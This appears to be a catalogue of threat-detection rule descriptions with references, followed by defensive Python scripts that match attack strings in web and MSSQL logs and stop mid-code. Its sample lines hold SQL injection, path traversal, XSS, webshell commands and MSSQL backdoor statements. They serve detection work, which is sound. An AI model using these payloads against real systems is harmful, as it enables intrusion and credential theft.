Cleartext Protocol Usage Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that encryption is used for all sensitive information in transit. Ensure that an encrypted channel is used for all administrative account access. https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf
Huawei BGP Authentication Failures Detects BGP failures which may be indicative of brute force attacks to manipulate routing. https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf
Juniper BGP Missing MD5 Detects Juniper BGP sessions missing an MD5 digest, which may be indicative of brute force attacks to manipulate routing. https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf
MITRE BZAR Indicators for Execution Windows DCE-RPC functions which indicate execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE https://github.com/mitre-attack/bzar#indicators-for-attck-execution
MITRE BZAR Indicators for Persistence Windows DCE-RPC functions which indicate persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE. https://github.com/mitre-attack/bzar#indicators-for-attck-persistence
Potential PetitPotam Attack Via EFS RPC Calls Detects usage of the Windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack referred to as PetitPotam. The usage of this RPC function should be rare, if it is ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP. Logs from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc. https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp, https://msrc.microsoft.com/update-guide/vulnerability/ADV210003, https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf, https://threatpost.com/microsoft-petitpotam-poc/168163/
Possible PrintNightmare Print Driver Install Detects the remote installation of a print driver, which is a possible indication of the exploitation of PrintNightmare (CVE-2021-1675). The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and/or through group policy. https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29, https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek, https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527, https://github.com/corelight/CVE-2021-1675, https://old.zeek.org/zeekweek2019/slides/bzar.pdf, https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/
SMB Spoolss Name Piped Usage Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled. https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1, https://dirkjanm.io/a-different-way-of-abusing-zerologon/, https://twitter.com/_dirkjan/status/1309214379003588608
Default Cobalt Strike Certificate Detects the presence of default Cobalt Strike certificate in the HTTPS traffic https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468
DNS Events Related To Mining Pools Identifies clients that may be performing DNS lookups associated with common currency mining pools. https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml
New Kind of Network (NKN) Detection NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma> https://github.com/nknorg/nkn-sdk-go, https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/, https://github.com/Maka8ka/NGLite
Suspicious DNS Z Flag Bit Set The DNS Z flag is a bit within the DNS protocol header that is, per the IETF design, meant to be reserved (unused). Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare. If it is set to non-zero and DNSSec is being used, then excluding the legitimate domains is low effort and high reward. Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one-off or the possibility of larger sensitive file gathering. This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs https://twitter.com/neu5ron/status/1346245602502443009, https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma, https://tools.ietf.org/html/rfc2929#section-2.1, https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS
DNS TOR Proxies Identifies IPs performing DNS lookups associated with common Tor proxies. https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml
Executable from Webdav Detects executable access via webdav6. Can be seen in APT 29 activity, such as in the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/ http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html, https://github.com/OTRF/detection-hackathon-apt29
OMIGOD HTTP No Authentication RCE Detects the exploitation of OMIGOD (CVE-2021-38647), which allows remote code execution (RCE) of commands as root with just a single unauthenticated HTTP request. Verify successful exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request. https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure, https://twitter.com/neu5ron/status/1438987292971053057?s=20
WebDav Put Request A general detection for the WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration. https://github.com/OTRF/detection-hackathon-apt29/issues/17
Publicly Accessible RDP Service Detects connections from routable IPs to an RDP listener, which is indicative of a publicly-accessible RDP service. https://attack.mitre.org/techniques/T1021/001/
Remote Task Creation via ATSVC Named Pipe - Zeek Detects remote task creation via at.exe or API interacting with the ATSVC named pipe https://web.archive.org/web/20230409194125/https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html
Possible Impacket SecretDump Remote Activity - Zeek Detects AD credential dumping using the impacket secretdump HKTL. Based on the SIGMA rule rules/windows/builtin/win_impacket_secretdump.yml https://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html
First Time Seen Remote Named Pipe - Zeek This detection excludes known named pipes accessible remotely and notifies on newly observed ones; it may help to detect lateral movement and remote execution using named pipes https://twitter.com/menasec1/status/1104489274387451904
Suspicious PsExec Execution - Zeek Detects execution of psexec or paexec with a renamed service name. This rule helps to filter out the noise if psexec is used for legitimate purposes or if an attacker uses a different psexec client other than the Sysinternals one https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html
Suspicious Access to Sensitive File Extensions - Zeek Detects known sensitive file extensions via Zeek Internal Research
Transferring Files with Credential Data via Network Shares - Zeek Transferring files with well-known filenames (sensitive files with credential data) using network shares https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
Kerberos Network Traffic RC4 Ticket Encryption Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting https://adsecurity.org/?p=3458
Apache Segmentation Fault Detects a segmentation fault error message caused by a crashing apache worker process http://www.securityfocus.com/infocus/1633
Apache Threading Error Detects an issue in apache logs that reports threading related errors https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md
Nginx Core Dump Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts. https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps, https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/
Download from Suspicious Dyndns Hosts Detects download of certain file types from hosts with dynamic DNS names (selected list) https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats
Windows WebDAV User Agent Detects WebDav DownloadCradle https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
Download From Suspicious TLD - Blacklist Detects download of certain file types from hosts in suspicious TLDs https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap, https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf, https://www.spamhaus.org/statistics/tlds/, https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/
Download From Suspicious TLD - Whitelist Detects executable downloads from suspicious remote systems Internal Research
F5 BIG-IP iControl Rest API Command Execution - Proxy Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash, https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029, https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516
HackTool - CobaltStrike Malleable Profile Patterns - Proxy Detects cobalt strike malleable profiles patterns (URI, User-Agents, Methods). https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile, https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100, https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile, https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/, https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile
HackTool - BabyShark Agent Default URL Pattern Detects Baby Shark C2 Framework default communication patterns https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845
HackTool - Empire UserAgent URI Combo Detects user agent and URI paths used by empire agents https://github.com/BC-SECURITY/Empire
PUA - Advanced IP/Port Scanner Update Check Detect the update check performed by Advanced IP/Port Scanner utilities. https://www.advanced-ip-scanner.com/, https://www.advanced-port-scanner.com/
PwnDrp Access Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity https://breakdev.org/pwndrop/
Raw Paste Service Access Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form https://www.virustotal.com/gui/domain/paste.ee/relations
Flash Player Update from Suspicious Location Detects a flashplayer update from an unofficial location https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb
Suspicious Network Communication With IPFS Detects connections to interplanetary file system (IPFS) containing a user's email address which mirrors behaviours observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages. https://blog.talosintelligence.com/ipfs-abuse/, https://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11, https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638
Telegram API Access Detects suspicious requests to Telegram API without the usual Telegram User-Agent https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/, https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/, https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/
APT User Agent Detects suspicious user agent strings used in APT malware in proxy logs Internal Research
Suspicious Base64 Encoded User-Agent Detects suspicious encoded User-Agent strings, as seen used by some malware. https://deviceatlas.com/blog/list-of-user-agent-strings#desktop
Bitsadmin to Uncommon IP Server Address Detects Bitsadmin connections to IP addresses instead of FQDN names https://isc.sans.edu/diary/Microsoft+BITS+Used+to+Download+Payloads/21027
Bitsadmin to Uncommon TLD Detects Bitsadmin connections to domains with uncommon TLDs https://twitter.com/jhencinski/status/1102695118455349248, https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/
Crypto Miner User Agent Detects suspicious user agent strings used by crypto miners in proxy logs https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65, https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h
HTTP Request With Empty User Agent Detects a potentially suspicious empty user agent string in proxy logs. Could potentially indicate an uncommon request method. https://twitter.com/Carlos_Perez/status/883455096645931008
Exploit Framework User Agent Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/
Hack Tool User Agent Detects suspicious user agent strings used by hack tools in proxy logs https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb, http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules
Malware User Agent Detects suspicious user agent strings used by malware in proxy logs http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules, http://www.botopedia.org/search?searchword=scan&searchphrase=all, https://networkraptor.blogspot.com/2015/01/user-agent-strings.html, https://perishablepress.com/blacklist/ua-2013.txt, https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents, https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q, https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large, https://twitter.com/crep1x/status/1635034100213112833
Windows PowerShell User Agent Detects Windows PowerShell Web Access https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest
Rclone Activity via Proxy Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string https://rclone.org/, https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone
Suspicious User Agent Detects suspicious malformed user agent strings in proxy logs https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb
Potential Base64 Encoded User-Agent Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding. https://blogs.jpcert.or.jp/en/2022/07/yamabot.html, https://deviceatlas.com/blog/list-of-user-agent-strings#desktop
Suspicious External WebDAV Execution Detects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns. https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4, https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462, https://www.trendmicro.com/en_no/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html, https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html
F5 BIG-IP iControl Rest API Command Execution - Webserver Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash, https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029, https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516
Successful IIS Shortname Fuzzing Scan When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol "~" https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml, https://www.exploit-db.com/exploits/19525, https://github.com/lijiejie/IIS_shortname_Scanner
Java Payload Strings Detects possible Java payloads in web access logs https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/, https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/, https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md, https://twitter.com/httpvoid0x2f/status/1532924261035384832, https://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035
JNDIExploit Pattern Detects exploitation attempt using the JNDI-Exploit-Kit https://github.com/pimps/JNDI-Exploit-Kit, https://web.archive.org/web/20231015205935/https://githubmemory.com/repo/FunctFan/JNDIExploit
Path Traversal Exploitation Attempts Detects path traversal exploitation attempts https://github.com/projectdiscovery/nuclei-templates, https://book.hacktricks.xyz/pentesting-web/file-inclusion
Source Code Enumeration Detection by Keyword Detects source code enumeration that use GET requests by keyword searches in URL strings https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html, https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1
SQL Injection Strings In URI Detects potential SQL injection attempts via GET requests in access logs. https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/, https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/, https://brightsec.com/blog/sql-injection-payloads/, https://github.com/payloadbox/sql-injection-payload-list, https://book.hacktricks.xyz/pentesting-web/sql-injection/mysql-injection
Server Side Template Injection Strings Detects SSTI attempts sent via GET requests in access logs https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection, https://github.com/payloadbox/ssti-payloads
Suspicious User-Agents Related To Recon Tools Detects known suspicious (default) user-agents related to scanning/recon tools https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb, https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst, https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92
Suspicious Windows Strings In URI Detects suspicious Windows strings in URI which could indicate possible exfiltration or webshell communication https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/
Webshell ReGeorg Detection Via Web Logs Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg. https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3, https://github.com/sensepost/reGeorg
Windows Webshell Strings Detects common commands used in Windows webshells https://bad-jubies.github.io/RCE-NOW-WHAT/, https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
Cross Site Scripting Strings Detects XSS attempts injected via GET requests in access logs https://github.com/payloadbox/xss-payload-list, https://portswigger.net/web-security/cross-site-scripting/contexts
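As an added example (mine, not part of this report or of the SigmaHQ rules it counts), the following Python script applies the kind of string matching the web-log rules above describe to a few constructed access-log lines: path traversal, SQL injection, XSS and Windows webshell command strings in the decoded URI; the ReGeorg pattern gated on an empty referer and an empty user-agent; and the user-agent checks (recon tool names, the rclone default agent, and an agent that ends in "=" and also decodes as valid base64). The indicator lists are short illustrative excerpts I chose, not the rules' full keyword sets, and the ReGeorg command verbs are an assumption. All sample lines are constructed.

```python
import base64
import binascii
import re
from urllib.parse import unquote_plus

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/120.0"
10.0.0.6 - - [10/Mar/2024:12:00:02 +0000] "GET /download?file=../../../../etc/passwd HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Mar/2024:12:00:03 +0000] "GET /item?id=1%27%20UNION%20SELECT%20username,password%20FROM%20users-- HTTP/1.1" 500 0 "-" "Mozilla/5.0"
10.0.0.8 - - [10/Mar/2024:12:00:04 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 300 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:05 +0000] "GET /wp-login.php HTTP/1.1" 404 0 "-" "WPScan v3.8.22 (https://wpscan.com/wordpress-security-scanner)"
10.0.0.10 - - [10/Mar/2024:12:00:06 +0000] "GET /sync HTTP/1.1" 200 0 "-" "rclone/v1.65.0"
10.0.0.11 - - [10/Mar/2024:12:00:07 +0000] "GET /beacon HTTP/1.1" 200 0 "-" "aGVsbG8gd29ybGQ="
10.0.0.12 - - [10/Mar/2024:12:00:08 +0000] "GET /tunnel.aspx?cmd=connect&target=10.0.0.1&port=445 HTTP/1.1" 200 0 "-" "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Illustrative excerpts only; the real rules carry much longer keyword lists.
PATH_TRAVERSAL = ("../", "..\\")
SQLI = ("' or 1=1", "' and 1=1", "union select", "union all select", "sleep(", "waitfor delay")
XSS = ("<script", "javascript:", "onerror=", "onload=")
WIN_WEBSHELL = ("whoami", "net user", "ipconfig", "cmd.exe /c", "cmd /c", "powershell ")
REGEORG = ("cmd=connect", "cmd=disconnect", "cmd=forward", "cmd=read")  # assumed ReGeorg verbs
RECON_UA = ("wpscan", "wfuzz", "recon-ng")


def parse(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def looks_base64(ua):
    """Tighten the 'ends with =' heuristic: the agent must also be valid base64."""
    if not ua.endswith("="):
        return False
    try:
        base64.b64decode(ua, validate=True)
        return True
    except (binascii.Error, ValueError):
        return False


def classify(rec):
    """Return the list of rule-style tags that fire for one parsed record."""
    tags = []
    # Decode twice so a double-encoded "%252e%252e/" is still seen as "../".
    uri = unquote_plus(unquote_plus(rec["uri"])).lower()
    ua = rec["ua"]
    ua_l = ua.lower()
    if any(p in uri for p in PATH_TRAVERSAL):
        tags.append("path_traversal")
    if any(p in uri for p in SQLI):
        tags.append("sqli")
    if any(p in uri for p in XSS):
        tags.append("xss")
    if any(p in uri for p in WIN_WEBSHELL):
        tags.append("win_webshell_cmd")
    # ReGeorg: command verbs in the query plus a null ("-") referer and user-agent.
    if rec["referer"] == "-" and ua == "-" and any(p in uri for p in REGEORG):
        tags.append("regeorg")
    if any(p in ua_l for p in RECON_UA):
        tags.append("recon_tool_ua")
    if ua_l.startswith("rclone/"):
        tags.append("rclone_ua")
    if looks_base64(ua):
        tags.append("base64_ua")
    return tags


def analyze(log_text):
    """Run every line through the checks; return (ip, uri, tags) for lines that fire."""
    hits = []
    for line in log_text.strip().splitlines():
        rec = parse(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            hits.append((rec["ip"], rec["uri"], tags))
    return hits


if __name__ == "__main__":
    for ip, uri, tags in analyze(SAMPLE_LOG):
        print(f"{ip:<12} {','.join(tags):<20} {uri}")
```

Two design points worth carrying into a real pipeline: decoding the URI twice before matching closes the trivial evasion of percent-encoding the payload twice, and the base64 check requires a successful strict decode rather than a trailing "=" alone, which trades a little recall for far fewer false positives on agents that merely end with that character.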
Mimikatz Use Detects Mimikatz keywords in different event logs (some of them only appear in older Mimikatz versions, which are however still used by various threat groups) https://tools.thehacker.recipes/mimikatz/modules
Microsoft Malware Protection Engine Crash This rule detects a suspicious crash of the Microsoft Malware Protection Engine https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5, https://technet.microsoft.com/en-us/library/security/4022344
Potential Credential Dumping Via WER - Application Detects Windows Error Reporting events where the crashed process is lsass. This could be the result of an intentional crash caused by techniques such as Lsass-Shtinkering to dump credentials https://github.com/deepinstinct/Lsass-Shtinkering, https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55
Ntdsutil Abuse Detects potential abuse of ntdsutil to dump ntds.dit database https://twitter.com/mgreen27/status/1558223256704122882, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)
Dump Ntds.dit To Suspicious Location Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location https://twitter.com/mgreen27/status/1558223256704122882, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)
Audit CVE Event Detects events generated by user-mode applications when they call the CveEventWrite API while a known vulnerability is being exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability). Unfortunately, that is about the only instance of CVEs being written to this log. https://twitter.com/VM_vivisector/status/1217190929330655232, https://twitter.com/DidierStevens/status/1217533958096924676, https://twitter.com/FlemmingRiis/status/1217147415482060800, https://www.youtube.com/watch?v=ebmW42YYveI, https://nullsec.us/windows-event-log-audit-cve/
Backup Catalog Deleted Detects backup catalog deletions https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx, https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100
Application Uninstalled An application has been removed. Check if it is critical. https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/Microsoft-Windows-MsiServer.xml, https://learn.microsoft.com/en-us/windows/win32/msi/event-logging
Restricted Software Access By SRP Detects restricted access to applications by the Software Restriction Policies (SRP) policy https://learn.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies, https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv
MSI Installation From Suspicious Locations Detects MSI package installation from suspicious locations https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html
MSI Installation From Web Detects installation of a remote MSI file from the web. https://twitter.com/_st0pp3r_/status/1583922009842802689
Atera Agent Installation Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent
MSSQL Add Account To Sysadmin Role Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
MSSQL Disable Audit Settings Detects when an attacker executes an "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" statement in order to disable or delete audit logs on the server https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/, https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16, https://learn.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16
MSSQL Server Failed Logon Detects failed logon attempts from clients to MSSQL server. https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/, https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html
MSSQL Server Failed Logon From External Network Detects failed logon attempts from clients with external network IP to an MSSQL server. This can be a sign of a bruteforce attack. https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/, https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html
MSSQL SPProcoption Set Detects when a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/, https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16
MSSQL XPCmdshell Suspicious Execution Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/, https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
MSSQL XPCmdshell Option Change Detects when the MSSQL "xp_cmdshell" stored procedure setting is changed. https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/, https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
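The MSSQL rules above all key on the text of the T-SQL statement recorded in the server's audit events. As an added example (mine, not the report's or SigmaHQ's), this Python snippet runs statement-level matching over a handful of constructed T-SQL strings and shows the one distinction that matters most in practice: enabling "xp_cmdshell" through "sp_configure" (option change) versus actually invoking "xp_cmdshell" (command execution), plus the sysadmin role addition, server audit tampering and "sp_procoption" startup-procedure patterns. The statements are constructed, and the regexes are illustrative rather than an exhaustive grammar of T-SQL.

```python
import re

# Constructed T-SQL statements as they might appear in a SQL Server audit
# record; none of them is taken from a real incident.
SAMPLE_STATEMENTS = [
    "SELECT name FROM sys.databases",
    "EXEC sp_addsrvrolemember 'svc_backup', 'sysadmin'",
    "ALTER SERVER ROLE sysadmin ADD MEMBER [CORP\\helpdesk]",
    "ALTER SERVER AUDIT [DefaultAudit] WITH (STATE = OFF)",
    "DROP SERVER AUDIT [DefaultAudit]",
    "EXEC sp_procoption @ProcName = 'sp_backdoor', @OptionName = 'startup', @OptionValue = 'on'",
    "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE",
    "EXEC master..xp_cmdshell 'whoami'",
]

# Legacy sp_addsrvrolemember with the sysadmin role, or the modern ALTER SERVER ROLE form.
SYSADMIN_RE = re.compile(
    r"\bsp_addsrvrolemember\b.*\bsysadmin\b"
    r"|\balter\s+server\s+role\s+\[?sysadmin\]?\s+add\s+member\b",
    re.I | re.S,
)
AUDIT_RE = re.compile(r"\b(?:alter|drop)\s+server\s+audit\b", re.I)
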